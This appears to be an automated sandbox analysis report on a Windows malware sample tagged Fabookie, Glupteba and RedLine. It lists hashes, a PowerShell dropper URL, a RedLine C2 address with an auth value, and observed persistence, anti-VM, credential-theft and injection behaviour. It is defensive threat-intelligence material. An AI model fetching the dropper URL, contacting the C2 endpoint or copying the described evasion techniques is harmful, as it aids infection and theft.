fabookie | 10690042b3461639b7006aeac45cda45c4461ad5b4e0edc890821e7e26f6f803

Resubmissions

23-02-2023 14:06

230223-reh7eshh41 10

12-01-2023 21:04

230112-zw3w6aba39 10

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
23-02-2023 14:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe
Size

13.6MB
MD5

0b1677efbd5bce8a2f526817d47db0d0
SHA1

b2c894a6326de4e936041fd91297290ba418e80b
SHA256

04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839
SHA512

a9424d510e3404e74c324689eedf10bdf3eac4faf995d58ecb12bd3240d5dfc2bdf384219211853494e029021786228a0bdc3d692c9d316edbbadf7444a7f1db
SSDEEP

196608:l3y+7MIsF/TG94kw++haZt65oEsmQs7pktIaAxaWy+vMpfCfG5TkAld96eSGQ685:ZvmFlk14aZtcpdtvMgu5TkqSGQE9Rc

Score

10^/10

fabookie glupteba redline bharat discovery dropper evasion infostealer loader persistence rootkit spyware stealer vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://nassarplastic.com/wp-content/config_20.ps1

Extracted

Family

redline

Botnet

bharat

77.73.134.15:43250

Attributes

auth_value
c5ff30d03db4d68f2e19663887b8c4cb

Signatures

Detect Fabookie payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1040-182-0x0000000140000000-0x000000014061B000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 17 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3340-278-0x0000000003020000-0x0000000003897000-memory.dmp	family_glupteba
behavioral2/memory/3340-393-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/3340-396-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/2440-445-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-494-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-504-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-505-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-506-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-518-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-519-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-547-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-548-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-549-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-550-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-551-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-554-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba
behavioral2/memory/1640-557-0x0000000000400000-0x0000000000C91000-memory.dmp	family_glupteba

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4016 2420 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4016	2420	rundll32.exe

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4912-235-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral2/memory/2560-246-0x0000000000A90000-0x0000000000AC6000-memory.dmp	family_redline

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

41 4800 powershell.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

2444 netsh.exe

flow	pid	process
41	4800	powershell.exe

pid	process
2444	netsh.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exeContinue.exeFiles.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	Continue.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	Files.tmp

Executes dropped EXE 14 IoCs

Processes:

Resource.exeFile.exeFolder.exeFiles.exeProceed.exeContinue.exeInfo.exeFiles.tmpFiles.exeFolder.exeFiles.tmpFile.execsrss.exeinjector.exe

pid	process
1040	Resource.exe
3340	File.exe
2080	Folder.exe
3472	Files.exe
2560	Proceed.exe
880	Continue.exe
3196	Info.exe
1292	Files.tmp
1032	Files.exe
4752	Folder.exe
4264	Files.tmp
2440	File.exe
1640	csrss.exe
3520	injector.exe

Loads dropped DLL 3 IoCs

Processes:

Files.tmpFiles.tmprundll32.exe

pid process

1292 Files.tmp
4264 Files.tmp
4652 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

pid	process
1292	Files.tmp
4264	Files.tmp
4652	rundll32.exe

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Resource.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Resource.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Resource.exe	vmprotect
behavioral2/memory/1040-182-0x0000000140000000-0x000000014061B000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

File.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	File.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Proceed.exeFiles.tmp

description	pid	process	target process
PID 2560 set thread context of 4912	2560	Proceed.exe	vbc.exe
PID 4264 set thread context of 4776	4264	Files.tmp	explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

File.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN File.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	File.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\ec80d76a-7f7a-40d0-9043-6fd2f06e7a78.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230223150721.pma	setup.exe

Drops file in Windows directory 2 IoCs

Processes:

File.exe

description ioc process

File opened for modification C:\Windows\rss File.exe
File created C:\Windows\rss\csrss.exe File.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4320 3196 WerFault.exe Info.exe
456 4776 WerFault.exe explorer.exe
1328 4652 WerFault.exe rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\rss	File.exe
File created	C:\Windows\rss\csrss.exe	File.exe

pid	pid_target	process	target process
4320	3196	WerFault.exe	Info.exe
456	4776	WerFault.exe	explorer.exe
1328	4652	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 20 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Info.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\LowerFilters	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Filters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters	Info.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Filters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\UpperFilters	Info.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	Info.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4368 schtasks.exe
3340 schtasks.exe

pid	process
4368	schtasks.exe
3340	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

File.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	File.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	File.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5052 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
5052	PING.EXE

description	flow	ioc
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exemsedge.exemsedge.exeschtasks.exeFile.exeidentity_helper.exeinjector.execsrss.exe

pid	process
4800	powershell.exe
4800	powershell.exe
4800	powershell.exe
568	msedge.exe
568	msedge.exe
3804	msedge.exe
3804	msedge.exe
3340	schtasks.exe
3340	schtasks.exe
2440	File.exe
2440	File.exe
2440	File.exe
2440	File.exe
2440	File.exe
2440	File.exe
2440	File.exe
2440	File.exe
2440	File.exe
2440	File.exe
904	identity_helper.exe
904	identity_helper.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
1640	csrss.exe
1640	csrss.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
1640	csrss.exe
1640	csrss.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe
3520	injector.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

3804 msedge.exe
3804 msedge.exe
3804 msedge.exe
3804 msedge.exe
3804 msedge.exe
3804 msedge.exe

pid	process
3804	msedge.exe
3804	msedge.exe
3804	msedge.exe
3804	msedge.exe
3804	msedge.exe
3804	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

Info.exepowershell.exeschtasks.execsrss.exe

description	pid	process
Token: SeLoadDriverPrivilege	3196	Info.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	3340	schtasks.exe
Token: SeImpersonatePrivilege	3340	schtasks.exe
Token: SeSystemEnvironmentPrivilege	1640	csrss.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

3804 msedge.exe
3804 msedge.exe
3804 msedge.exe

pid	process
3804	msedge.exe
3804	msedge.exe
3804	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exeFiles.exeContinue.exemsedge.exeFiles.tmpcmd.exeProceed.exeFiles.exeFiles.tmp

description	pid	process	target process
PID 4360 wrote to memory of 1040	4360	04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe	Resource.exe
